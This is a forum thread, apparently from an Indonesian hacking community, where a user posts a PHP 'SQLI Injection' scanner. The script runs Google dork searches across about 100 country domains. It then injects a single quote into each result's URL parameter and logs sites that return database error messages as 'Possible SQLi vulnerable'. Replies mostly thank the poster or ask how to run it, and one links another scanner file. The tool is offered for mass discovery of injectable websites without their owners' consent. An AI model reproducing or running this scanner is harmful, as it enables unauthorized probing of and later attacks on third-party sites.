Scrift Php Scanner SQLI Injection

[oela]

Code:

<?php
set_time_limit(0);
error_reporting(0);
ini_set('memory_limit', '128M');
if($argc < 2) {
    banner();
    print "[?] Usage: php opensource.php --dork <dork>\r\n";
    print "[!] Example: php opensource.php  --dork inurl:\"product.php?id=\"";
} elseif(($argc > 1) && ($argv[1] == "--dork") && (isset($argv[2]))) {
    $dork = $argv[2];
    $googles = array("ZM", "ZA", "YU", "VU", "VN", "VG", "VE", "UY", "UK", "UA", "TZ", "TW", "TR", "TH", "SN", "SK", "SI", "SG", "SE", "SA", "RO", "QA", "PY", "PT", "PR", "PK", "PH", "PE", "PA", "OM", "NZ", "NO", "NL", "NI", "NG", "NA", "MY", "MX", "MV", "MU", "MT", "MN", "MA", "LV", "LU", "LT", "LK", "LI", "LB", "LA", "KZ", "KW", "KG", "KE", "JO", "JM", "IT", "IN", "IL", "IE", "ID", "HU", "HR", "HK", "GT", "GR", "GP", "GL", "GE", "FR", "FI", "ES", "EG", "EC", "DZ", "DO", "DK", "DE", "CU", "CR", "CO", "CL", "CH", "CA", "BZ", "BY", "BW", "BS", "BR", "BO", "BN", "BH", "BG", "BE", "BD", "BA", "AU", "AT", "AR", "AM", "AG", "AE", "");
    foreach($googles as $google) {
        $limit = 2000;
        $page = 100;
        $engine = "http://www.google.com/cse?cx=013269018370076798483:gg7jrrhpsy4&cof=FORID:1&q=".$dork."&num=100&start=".$page."&meta=cr%3Dcountry".$google;
        if($google == "") {
            $engine = "http://www.google.com/cse?cx=013269018370076798483:gg7jrrhpsy4&cof=FORID:1&q=".$dork."&num=100&start=".$page;
        }
        print "\r\n\r\n[+] Scanning ".$dork." with Google ".$google."\r\n\r\n";
        while($page <= $limit) {
            $hasilz = split("<a href=", FetchURL($engine));
            foreach($hasilz as $hasilx) {
                if(preg_match("/(.*) class=l/", $hasilx, $hasil)) {
                    $logging = fopen("vulns.txt", "a+");
                    $logginx = fopen("scanlog.txt", "a+");
                    $domain = split("/", $hasil[1]);
                    if((!ereg($domain[2], file_get_contents("vulns.txt"))) && (!ereg($domain[2], file_get_contents("scanlog.txt"))) ){
                        if (ereg("^http", str_replace("\"", "", $hasil[1]))){
                            $hajar = FetchURL(str_replace("=", "='", str_replace("\"", "", $hasil[1])));
                            if(preg_match("/You have an error in your SQL','Division by zero in|supplied argument is not a valid MySQL result resource in|Call to a member function','Microsoft JET Database|ODBC Microsoft Access Driver|Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark|Microsoft OLE DB Provider for Oracle|Incorrect syntax near|SQL query failed/", $hajar)) {
                                print ":D ".str_replace("\"", "", $hasil[1])." <--- Possible SQLi vulnerable!\r\n";
                                fwrite($logging, str_replace("\"", "", $hasil[1])."\r\n");
                                fclose($logging);
                            } else {
                                print ":( ".str_replace("\"", "", $hasil[1])." <--- No error found!\r\n";
                                fwrite($logginx, str_replace("\"", "", $hasil[1])."\r\n");
                                fclose($logginx);
                            }
                        }
                    }
                }
            }
            $page = $page + 100;
        }
        print "\r\n\r\n[+] Done!\r\n\r\n";
    }
} else {
    banner();
    print "[?] Usage: php opensource.php --dork <dork>\r\n";
    print "[!] Example: php opensource.php  --dork inurl:\"product.php?id=\"";
}
function banner(){
?>

<?php
}
function FetchURL($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/3.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)");
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    $data = curl_exec($ch);
    if(!$data) {
        return false;
    }
    return $data;
}
?>

[T3mp3]

Nyicip dl bang peti..
Suwun..

[sunawan]

mantaps dah superman peti.....hihihihihi

ijin nyoba dulu yha

[cancer]

izin nyoba ah om...

[Cyber-Kiie]

ikud nyoba schrift nya om :)

[bumble_be]

bang cara pk ny gmn lewat cmd ato lewat rowser

[note]

woke save dulu,tinggal cara makenya nie????

[LOL1ds]

Cara make-nya gimna mas momod..??
maap ane NubitoL..

[n3tm45t3r]

http://ngaceng-a.biz/xc0desqlscan.v2.5.txt

[ping]

cara njalaninya gimana kk